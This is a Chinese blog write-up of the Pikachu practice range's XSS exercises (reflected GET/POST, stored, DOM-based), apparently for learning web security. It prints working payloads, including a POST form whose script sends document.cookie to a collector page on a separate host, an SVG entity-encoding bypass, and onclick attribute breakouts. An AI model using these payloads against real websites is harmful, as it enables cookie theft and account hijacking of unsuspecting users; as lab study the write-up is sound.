Pikachu靶场XSS思路

布满荆棘的人生 2023-07-23 03:39 21阅读 0赞

### 反射型xss(get) ###

这个在前端对输入的字符串的长度做了限制，前端的限制都是唬人的，改掉就可以了，然后输入测试字符串

'"<>?&

在源码里定位一下，然后观察到url，

<p class='notice'>who is '"<>&?,i don't care!</p>
    http://127.0.0.1:8000/vul/xss/xss_reflected_get.php?message=%27%22%3C%3E%26%3F&submit=submit

通过抓包可以知道并没有与后台发生交互，说明是反射型；通过url可以看出是get型。构造payload，

我们就可以把构造的url发给别人，达到xss攻击的效果。

### 反射型xss(post) ###

这个题目按照网上的做法我没有成功，因为浏览器会在单引号前加上转义字符，造成js脚本无法执行。

比如我想弹一个字符’1’，但浏览器会在前后加上转义符，造成脚本并没有执行，最终的解决方案是使用<svg>标签，后面会细说。  
首先这是一道post请求的xss攻击，get请求我们可以把攻击脚本嵌入到url里，达到攻击效果，post请求url里并没有链接，如何才能达到攻击效果。  
我们可以自己搭建一个可以post请求的页面，作者已经给我们写好了这个页面，注意修改请求的ip地址。

<form method="post" action="http://192.168.1.4/pikachu/vul/xss/xsspost/xss_reflected_post.php">
        <input id="xssr_in" type="text" name="message" value=
        "<script>
    document.location = 'http://192.168.1.15/pkxss/xcookie/cookie.php?cookie=' + document.cookie;
    	</script>"
    	 />
        <input id="postsubmit" type="submit" name="submit" value="submit" />
    </form>

首先这个post页面中有一个表单，值是下面这一串

"<script>
     document.location = 'http://192.168.1.15/pkxss/xcookie/cookie.php?cookie=' + document.cookie;
    </script>"

发送给下面这个链接

http://192.168.1.4/pikachu/vul/xss/xsspost/xss_reflected_post.php

也就是有xss漏洞的那个页面，当浏览器发生跳转后，从(post.html到xss\_reflected\_post.php)，会执行script标签里的脚本，这个脚本是请求

http://192.168.1.15/pkxss/xcookie/cookie.php

上面这个页面，带有参数，参数是从带有xss漏洞的页面上取到的cookie，后台收集cookie的页面会继续重定向到首页，像是什么也没有发生一样。  
思路大致就是这样，不过我在post页面上稍做了修改。

<form method="post" action="http://192.168.1.4/pikachu/vul/xss/xsspost/xss_reflected_post.php">
        <input id="xssr_in" type="text" name="message" value=
        "<svg><script>
    document.location = &#39;http://192.168.1.33/pkxss/xcookie/cookie.php?cookie=&#39; + document.cookie;
    	</script>"
    	 />
        <input id="postsubmit" type="submit" name="submit" value="submit" />
    </form>

首先在<script>标签前加了一个<svg>标签，参考此[链接][Link 1]，然后利用其转义&是&的实体转义，因为我们的请求经历了两次解析，所以第一次请求&变成了&，第二次请求把’变成了’，这样就可以成功执行js脚本了。浏览器解析这方面还是很有必要下工夫研究的。

### 存储型xss ###

存储型xss顾名思义就是会储存到数据库中，造成持续的伤害，先输入一段测试字符串

'"<>?&666666

可以检测是否对这些特殊字符进行处理，666666用来定位字段，提交后，查看评论的位置。

然后就可以构造payload了，

</p><script>alert(1)</script>
    <script>alert(1)</script>

上面两个均可，每次打开这个页面都会执行脚本，存储型xss原理即是如此。

### DOM型xss ###

我们先随便输入字符串，查看一下这个submit要搞什么鬼，然后会出现一个带链接的what do you see?，点击这个字符会跳转到某个链接，查看一下输入字符后发生了什么。

这一段就是前端对我们的输入的操作，点击提交后，会调用domxss函数。然后该函数取出我们输入的字符串，插入到div中间，然后点一下会跳转到相应的链接。  
既然使用到了点击的动作，那我们就构造一个点击时的xss攻击，删掉双引号和加号后，str就是我们输入的内容，构造如下

待payload
    <a href='str'>what do you see?</a>
    
    构造payload
    <a href='1' onclick=alert(1)>'>what do you see?</a>
    
    取出payload
    1' onclick=alert(1)>

这样当点击时，就会弹窗这个利用起来貌似有点困难，只牵涉到前端的变化，而且发送不到别人那里。

### DOM型xss-x ###

作者也介绍了前端的写法千奇百怪，我们先理清一下这个是要做什么，看一下源码，

输入字符串后点提交，表单是以get方式提交的，url会发生改变，后端会进行一个这样的处理

$html.= "<a href='#' οnclick='domxss()'>有些费尽心机想要忘记的事情,后来真的就忘掉了</a>";

点击这句话，触发domxss函数，会查找search的内容，把参数取出来，放到id为dom的标签里，这点和上面一题的类似，我们可以构造payload了，其实和上面一题可以完全相同。

1' onclick=alert(1)>

这种牵涉到url的DOM型就可以产生攻击行为了，将我们构造好的url发给别人，产生攻击。

### 参考链接： ###

[xss编码绕过原理以及从中学习到的几个例子][xss]  
[深入理解浏览器解析机制和XSS向量编码][XSS]  
[SVG XSS的一个黑魔法][Link 1]  
[XSSer 升级之路][XSSer]  
[XSS常见Paylaod分析-1][XSS_Paylaod_-1]  
[XSS 绕过常用语句][XSS 1]  
[HTML 字符实体][HTML]  
[HTML ISO-8859-1 参考手册][HTML ISO-8859-1]  
[PHP URL 重定向 的三种方法（转) ][PHP URL _ _]  
[header][]  
[HTML <form> 标签的 action 属性][HTML _form_ _ action]

欢迎关注公众号，进一步交流

![公众号二维码.jpg][.jpg]

[Link 1]: https://www.hackersb.cn/hacker/85.html
[xss]: https://0verwatch.top/xss-encodeorder.html
[XSS]: http://bobao.360.cn/learning/detail/292.html
[XSSer]: http://xuelinf.github.io/2016/05/14/-level-5-%E8%A2%AB%E5%BF%BD%E7%95%A5%E7%9A%84%E5%8F%8D%E6%96%9C%E6%9D%A0-XSS%E5%8D%87%E7%BA%A7%E4%B9%8B%E8%B7%AF/
[XSS_Paylaod_-1]: https://zhuanlan.zhihu.com/p/30346946
[XSS 1]: https://damit5.com/2017/10/15/XSS-%E7%BB%95%E8%BF%87%E5%B8%B8%E7%94%A8%E8%AF%AD%E5%8F%A5/
[HTML]: https://www.w3school.com.cn/html/html_entities.asp
[HTML ISO-8859-1]: https://www.w3school.com.cn/tags/html_ref_entities.html
[PHP URL _ _]: https://my.oschina.net/qingyi0908/blog/69146
[header]: https://www.php.net/manual/zh/function.header.php
[HTML _form_ _ action]: https://www.w3school.com.cn/tags/att_form_action.asp
[.jpg]: /images/20230528/660eed3d53b348198ccf1b32202e5443.png